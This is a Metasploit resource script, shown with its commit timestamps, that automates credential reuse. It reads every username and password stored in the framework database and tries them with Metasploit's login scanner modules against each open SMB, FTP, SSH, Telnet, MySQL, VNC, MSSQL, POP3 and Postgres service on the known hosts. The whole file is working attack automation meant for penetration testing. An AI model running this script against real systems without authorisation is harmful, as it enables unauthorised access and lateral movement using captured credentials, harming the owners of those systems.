metasploit-framework/scripts/resource/auto_cred_checker.rc

310 lines
11 KiB
Plaintext
Raw Normal View History

2012-02-02 16:20:24 +00:00
# auto-cred-checker.rc
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
2012-02-05 07:43:31 +00:00
# This Metasploit RC-File could be used to automatically check already discovered
# credentials against some other login services.
# It uses allready discovered credential from the database and tries to use them against some
# other services
2012-02-02 16:20:24 +00:00
<ruby>
2012-02-05 07:43:31 +00:00
#we look in the global datastore for a global VERBOSE option and use it
if (framework.datastore['VERBOSE'] == "true")
verbose = 1 #true
2012-02-02 16:20:24 +00:00
else
2012-02-05 07:43:31 +00:00
verbose = 0
2012-02-02 16:20:24 +00:00
end
2012-03-13 07:33:22 +00:00
# Test and see if we have a database connected
begin
framework.db.hosts
rescue ::ActiveRecord::ConnectionNotEstablished
print_error("Database connection isn't established")
return
end
2012-02-02 16:20:24 +00:00
def jobwaiting(verbose)
2012-02-05 07:43:31 +00:00
maxjobs=15 #throtteling if we get too much jobs
while(framework.jobs.keys.length >= maxjobs)
::IO.select(nil, nil, nil, 2.5)
if (verbose == 1)
print_error("waiting for finishing some modules... active jobs: #{framework.jobs.keys.length} / threads: #{framework.threads.length}")
end
2012-02-02 16:20:24 +00:00
end
end
def infos(serv,creds,host)
print_line("")
print_line("====================================")
print_line("IP: #{host.address}")
print_line("OS: #{host.os_name}")
print_line("Servicename: #{serv.name}")
print_line("Service Port: #{serv.port.to_i}")
print_line("Service Protocol: #{serv.proto}")
print_line("User: #{creds.user}")
print_line("Pass: #{creds.pass}")
print_line("====================================")
print_line("")
end
framework.db.creds.each do |creds|
2012-02-05 07:43:31 +00:00
# ... we do not check windows hashes ... have a look at auto_pass_the_hash.rc
next if ( creds.ptype == "smb_hash" )
2012-02-02 16:20:24 +00:00
password = creds.pass
username = creds.user
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
framework.db.hosts.each do |host|
host.services.each do |serv|
2012-02-05 07:43:31 +00:00
next if not serv.host
next if (serv.state != Msf::ServiceState::Open)
2012-02-05 07:43:31 +00:00
# for now we only check these services, you can add some more ...
next if not (serv.name =~ /smb/ or
serv.name =~ /microsoft-ds/ or
serv.name =~ /netbios-ssn/ or
serv.name =~ /ftp/ or
serv.name =~ /ssh/ or
serv.name =~ /telnet/ or
serv.name =~ /mysql/ or
serv.name =~ /vnc/ or
serv.name =~ /mssql/ or
serv.name =~ /pop3/ or
serv.name =~ /postgres/)
2012-02-02 16:20:24 +00:00
xport = serv.port.to_i
2012-02-05 07:43:31 +00:00
xprot = serv.proto
xname = serv.name
xhost = host.address
2012-02-02 16:20:24 +00:00
if(xname =~ /smb/ or xname =~ /microsoft-ds/ or xname =~ /netbios-ssn/)
2012-02-05 07:43:31 +00:00
print_line("smb_login")
2012-02-02 16:20:24 +00:00
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/smb/smb_login")
run_single("set RHOSTS #{xhost}")
2012-02-02 16:20:24 +00:00
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
2012-02-02 16:20:24 +00:00
run_single("set SMBUser #{username}")
run_single("set SMBPass #{password}")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
if(verbose == 1)
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
end
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
elsif (xname =~ /ftp/)
2012-02-02 16:20:24 +00:00
print_line("ftp_login")
if(verbose == 1)
infos(serv,creds,host)
end
run_single("use auxiliary/scanner/ftp/ftp_login")
run_single("set RHOSTS #{xhost}")
2012-02-05 07:43:31 +00:00
run_single("set RPORT #{xport}")
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
2012-02-02 16:20:24 +00:00
if(verbose == 1)
run_single("set VERBOSE true")
run_single("run -j")
2012-02-05 07:43:31 +00:00
else
2012-02-02 16:20:24 +00:00
run_single("run -j -q")
end
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /ssh/)
print_line("ssh_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/ssh/ssh_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
2012-02-02 16:20:24 +00:00
if(verbose == 1)
run_single("set VERBOSE true")
2012-02-05 07:43:31 +00:00
run_single("run -j")
2012-02-02 16:20:24 +00:00
else
run_single("run -j -q")
end
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /telnet/)
print_line("telnet_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/telnet/telnet_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
2012-02-02 16:20:24 +00:00
if(verbose == 1)
run_single("set VERBOSE true")
2012-02-05 07:43:31 +00:00
run_single("run -j")
2012-02-02 16:20:24 +00:00
else
run_single("run -j -q")
end
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /mysql/)
print_line("mysql_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/mysql/mysql_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
2012-02-02 16:20:24 +00:00
if(verbose == 1)
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
end
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /vnc/)
print_line("vnc_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/vnc/vnc_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
if(verbose == 1)
2012-02-02 16:20:24 +00:00
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
2012-02-05 07:43:31 +00:00
end
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /mssql/)
print_line("mssql_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/mssql/mssql_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
if(verbose == 1)
2012-02-02 16:20:24 +00:00
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
2012-02-05 07:43:31 +00:00
end
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif(xname =~ /pop3/)
print_line("pop3_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/pop3/pop3_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
if(verbose == 1)
2012-02-02 16:20:24 +00:00
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
2012-02-05 07:43:31 +00:00
end
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
elsif (xname =~ /postgres/)
print_line("postgres_login")
if(verbose == 1)
infos(serv,creds,host)
end
2012-02-05 07:43:31 +00:00
run_single("use auxiliary/scanner/postgres/postgres_login")
2012-02-02 16:20:24 +00:00
run_single("set RHOSTS #{xhost}")
run_single("set RPORT #{xport}")
2012-02-05 07:43:31 +00:00
run_single("unset USER_FILE") # to check just the credentials of the db we have to disable this
run_single("unset PASS_FILE") # to check just the credentials of the db we have to disable this
run_single("unset USERPASS_FILE") # to check just the credentials of the db we have to disable this
run_single("set BLANK_PASSWORDS false") # to check just the credentials of the db we have to disable this
run_single("set USER_AS_PASS false") # to check just the credentials of the db we have to disable this
run_single("set USERNAME #{username}")
run_single("set PASSWORD #{password}")
if(verbose == 1)
2012-02-02 16:20:24 +00:00
run_single("set VERBOSE true")
run_single("run -j")
else
run_single("run -j -q")
2012-02-05 07:43:31 +00:00
end
2012-02-02 16:20:24 +00:00
jobwaiting(verbose)
run_single("back")
2012-02-05 07:43:31 +00:00
2012-02-02 16:20:24 +00:00
end
2012-02-05 07:43:31 +00:00
end # host.services.each loop
end # framework.db.hosts.each loop
2012-02-02 16:20:24 +00:00
end
</ruby>